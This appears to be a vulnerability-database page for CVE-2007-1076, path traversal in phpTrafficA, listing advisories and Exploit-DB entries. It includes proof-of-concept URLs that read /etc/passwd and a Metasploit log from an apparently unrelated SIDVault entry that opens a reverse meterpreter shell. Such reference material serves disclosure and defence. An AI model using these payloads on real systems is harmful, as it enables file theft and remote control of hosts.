CVE-2007-1076
published 2007-02-22
Priority: P339 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 4.05% (89.4th percentile)
Multiple directory traversal vulnerabilities in phpTrafficA 1.4.1, and possibly earlier, allow remote attackers to include arbitrary local files via a .. (dot dot) in the (1) file parameter to plotStat.php and the (2) lang parameter to banref.php.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phptraffica | phptraffica | — | — |
| zoneo-soft | phptraffica | <= 1.4.2 | — |
| zoneo-soft | phptraffica | <= 1.4 | — |
GHSA
GHSA-9r86-m2fw-8wr3: Multiple unspecified vulnerabilities in phpTrafficA before 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3428 [HIGH] GHSA-9r86-m2fw-8wr3: Multiple unspecified vulnerabilities in phpTrafficA before 1
Multiple unspecified vulnerabilities in phpTrafficA before 1.4.2 allow remote attackers to have an unknown impact via the file parameter to (1) plotStatBar.php or (2) plotStatPie.php, different vectors than CVE-2007-1076.
GHSA
GHSA-mx67-p696-pxj5: Directory traversal vulnerability in index
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3425 [HIGH] GHSA-mx67-p696-pxj5: Directory traversal vulnerability in index
Directory traversal vulnerability in index.php in phpTrafficA 1.4.2 and earlier allows remote attackers to include arbitrary local files via the lang parameter, a different vector and version than CVE-2007-1076.2.
GHSA
GHSA-42xf-g5pp-5x9x: Multiple directory traversal vulnerabilities in phpTrafficA 1
ghsa_unreviewed·2022-05-01
CVE-2007-1076 [HIGH] CWE-22 GHSA-42xf-g5pp-5x9x: Multiple directory traversal vulnerabilities in phpTrafficA 1
Multiple directory traversal vulnerabilities in phpTrafficA 1.4.1, and possibly earlier, allow remote attackers to include arbitrary local files via a .. (dot dot) in the (1) file parameter to plotStat.php and the (2) lang parameter to banref.php.
No detection rules found.
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
exploitdb·2009-09-04
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
---
#--attack-log--
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree...
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)
#meterpreter >
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metaspl
Exploit-DB
phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion
exploitdb·2007-02-21
CVE-2007-1076 phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/22655/info
phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
phpTrafficA version 1.4.1 is vulnerable to these issues.
http://www.example.com/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00
Exploit-DB
phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion
exploitdb·2007-02-21
CVE-2007-1076 phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion
---
source: https://www.securityfocus.com/bid/22655/info
phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
phpTrafficA version 1.4.1 is vulnerable to these issues.
http://www.example.com/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2007-February/001377.html
http://osvdb.org/33373
http://osvdb.org/33374
http://secunia.com/advisories/24242
http://soft.zoneo.net/phpTrafficA/news.php
http://www.bugtraq.ir/articles/file-inclusion/phpTrafficA-1.4.1-Local-File-Inclusion/1
http://www.securityfocus.com/bid/22655
http://www.vupen.com/english/advisories/2007/0709
https://exchange.xforce.ibmcloud.com/vulnerabilities/32628